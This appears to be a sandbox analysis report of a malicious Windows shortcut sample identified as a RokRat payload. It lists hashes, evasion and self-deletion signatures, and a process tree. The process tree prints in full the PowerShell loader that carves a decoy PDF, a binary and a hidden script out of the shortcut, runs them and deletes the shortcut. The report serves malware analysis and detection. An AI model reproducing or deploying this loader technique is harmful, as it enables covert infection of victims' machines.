Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09/04/2024, 01:58
Behavioral task
behavioral1
Sample
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
Resource
win7-20240221-en
General
-
Target
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk
-
Size
56.2MB
-
MD5
358122718ba11b3e8bb56340dbe94f51
-
SHA1
0c61effe0c06d57835ead4a574dde992515b9382
-
SHA256
b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56
-
SHA512
7c4beb041fde779e21b01f26c571026b1ba38a24002b89bc57ca6cf2bc0e6e0ff38f6a100a30e3622eff403ba7ebb572839b033f81b0663939666a443184eb01
-
SSDEEP
98304:xe9nAp+et8sMdP7jKFYM0bI1/c/zNYP2wn:xIAp+etaZvdm/wG2wn
Malware Config
Signatures
-
Detect Rokrat payload 2 IoCs
resource yara_rule behavioral2/memory/2024-148-0x0000000032A80000-0x0000000032B63000-memory.dmp family_rokrat behavioral2/memory/2024-150-0x0000000032A80000-0x0000000032B63000-memory.dmp family_rokrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 27 2024 powershell.exe 47 2024 powershell.exe 51 2024 powershell.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
pid Process 208 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\7695.dat powershell.exe -
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral2/files/0x0005000000022762-26.dat pdf_with_link_action -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 208 powershell.exe 208 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 2024 powershell.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 208 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1672 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe 1672 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2116 wrote to memory of 720 2116 cmd.exe 86 PID 2116 wrote to memory of 720 2116 cmd.exe 86 PID 2116 wrote to memory of 720 2116 cmd.exe 86 PID 720 wrote to memory of 4640 720 cmd.exe 88 PID 720 wrote to memory of 4640 720 cmd.exe 88 PID 720 wrote to memory of 4640 720 cmd.exe 88 PID 720 wrote to memory of 208 720 cmd.exe 90 PID 720 wrote to memory of 208 720 cmd.exe 90 PID 720 wrote to memory of 208 720 cmd.exe 90 PID 208 wrote to memory of 1672 208 powershell.exe 96 PID 208 wrote to memory of 1672 208 powershell.exe 96 PID 208 wrote to memory of 1672 208 powershell.exe 96 PID 208 wrote to memory of 3792 208 powershell.exe 97 PID 208 wrote to memory of 3792 208 powershell.exe 97 PID 208 wrote to memory of 3792 208 powershell.exe 97 PID 3792 wrote to memory of 2024 3792 cmd.exe 98 PID 3792 wrote to memory of 2024 3792 cmd.exe 98 PID 3792 wrote to memory of 2024 3792 cmd.exe 98 PID 1672 wrote to memory of 1892 1672 AcroRd32.exe 101 PID 1672 wrote to memory of 1892 1672 AcroRd32.exe 101 PID 1672 wrote to memory of 1892 1672 AcroRd32.exe 101 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 4092 1892 RdrCEF.exe 102 PID 1892 wrote to memory of 3112 1892 RdrCEF.exe 103 PID 1892 wrote to memory of 3112 1892 RdrCEF.exe 103
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"&& exit2⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od3⤵PID:4640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe "$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\Admin\AppData\Local\Temp'}; $lnkPath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0382A8AD} | Select-Object -ExpandProperty FullName;$lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001090, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x004B4DD3;$lnkFile.Read($pdfFile, 0, 0x004B4DD3);$pdfPath = $lnkPath.replace('.lnk','.pdf');sc $pdfPath $pdfFile -Encoding Byte;& $pdfPath;$lnkFile.Seek(0x004B5E63,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x000D9402;$lnkFile.Read($exeFile, 0, 0x000D9402);$exePath=$env:public+'\'+'panic.dat';sc $exePath $exeFile -Encoding Byte;$lnkFile.Seek(0x0058F265,[System.IO.SeekOrigin]::Begin);$stringByte = New-Object byte[] 0x000005A9;$lnkFile.Read($stringByte, 0, 0x000005A9);$batStrPath = $env:temp+'\'+'para.dat';$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$string | Out-File -FilePath $batStrPath -Encoding ascii;$lnkFile.Seek(0x0058F80E,[System.IO.SeekOrigin]::Begin);$batByte = New-Object byte[] 0x00000135;$lnkFile.Read($batByte, 0, 0x00000135);$executePath = $env:temp+'\'+'price.bat';Write-Host $executePath;Write-Host $batStrPath;$bastString = [System.Text.Encoding]::UTF8.GetString($batByte);$bastString | Out-File -FilePath $executePath -Encoding ascii;& $executePath;$lnkFile.Close();remove-item -path $lnkPath -force;"3⤵
- Deletes itself
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\b1025baa59609708315326fe4279d8113f7af3f292470ef42c33fccbb8aa3e56.pdf"4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140435⤵
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DACD951A229C6A68833AA5F48F1FD5B3 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:4092
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4C45D089C5B9D6BD4983C7455E264EB1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4C45D089C5B9D6BD4983C7455E264EB1 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:16⤵PID:3112
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6473EA30E2A725634C0F34F7B266AE16 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6473EA30E2A725634C0F34F7B266AE16 --renderer-client-id=4 --mojo-platform-channel-handle=2184 --allow-no-sandbox-job /prefetch:16⤵PID:1508
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B9D1FB36430807F2007ADCD709B6874D --mojo-platform-channel-handle=2552 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:552
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D52BB1E171A1F39BE6CB6EE1F5546092 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:3008
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AA7AE9C84860EA7CB988BCE413A0187A --mojo-platform-channel-handle=1984 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:26⤵PID:4556
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\price.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$stringPath=$env:temp+'\'+'para.dat';$stringByte = Get-Content -path $stringPath -encoding byte;$string = [System.Text.Encoding]::UTF8.GetString($stringByte);$scriptBlock = [scriptblock]::Create($string);&$scriptBlock;"5⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eogss3cs\eogss3cs.cmdline"6⤵PID:536
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DFA.tmp" "c:\Users\Admin\AppData\Local\Temp\eogss3cs\CSCD188DF807F524EB0A737C0B8B2BFD6BA.TMP"7⤵PID:1312
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\prt2c2kk\prt2c2kk.cmdline"6⤵PID:2244
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\prt2c2kk\CSC80B2F9C5B38C4D1BB717C03DE6D3734B.TMP"7⤵PID:2164
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ebh3iuyy\ebh3iuyy.cmdline"6⤵PID:2448
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F71.tmp" "c:\Users\Admin\AppData\Local\Temp\ebh3iuyy\CSCC4B15910B91A4F46816E12DBA23D16A.TMP"7⤵PID:4300
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jopjq113\jopjq113.cmdline"6⤵PID:2328
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES800D.tmp" "c:\Users\Admin\AppData\Local\Temp\jopjq113\CSC7B027557D534A1AB189EBFA362BE332.TMP"7⤵PID:3608
-
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4352
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD50c71bc6c87639460aa52cb5fe3ba3359
SHA1bf02d394ea0409c46e9a1963a5015f2968f712bd
SHA25695b722158ec7317faa24ed88f968d139c483d37f308aa2c11f6babb22cc3df73
SHA5128cc3fa25b5847386e3c0e6bcf29fc81c17aab0e2200a2f60488107002f16691383a7aff6a2bb5b93f2a7d2e47f13a6dc0fd1b8216b34efcfeed4767d6baf4e96
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
19KB
MD5257bfcbe31774f8b3859a696295da21b
SHA13ef6ee7ce9a28953c5fbcefb2fe684bb8c1928ac
SHA256dfd54ba9eab35e3eac7775c71838f1883a5f8d93a529f9819cdb4cc7b037919f
SHA5123b1105c619019c5d132b97fd5af94ae32276f0f0873025807d8b90831524ae7d0f434ed271f445c68943f7e475d915686b78a950dd4b4aad412115afafcfc431
-
Filesize
53KB
MD5721485f5cbeb4c86d828ce05d4630eb1
SHA124d734ccea13678d4fa48fc9b1857e5a48ab80dd
SHA256992a648300cce065459fdf51ee34694c1567e87a5fdd19347f4734ec423db992
SHA512d63ce4851ea095af93e36a879eac9e6dd17280d53aa104165af1d5b2423836783bb126692890e15a7d445f80ea2aa79ebee72a1828eca978ae2c03d8bb174455
-
Filesize
1KB
MD5bff3f9b08ba6525283ec0d4d351e1b80
SHA17b81889a012aba5ad0919741e76878ff9e376d16
SHA256af994c38cd48c25a21f7fdfa38bcd6bd34ca896339c6f399b9e698a625e7bdea
SHA5129188ac7ae3b6b592e4ffef03a45c0a4334df7103d85083760a5aebad698af72de68a7ca8b793a15998a573bae8dee221469fedb09d186458b53409f8c417d08a
-
Filesize
1KB
MD52578480f723c0cd9b402c0ab3132df74
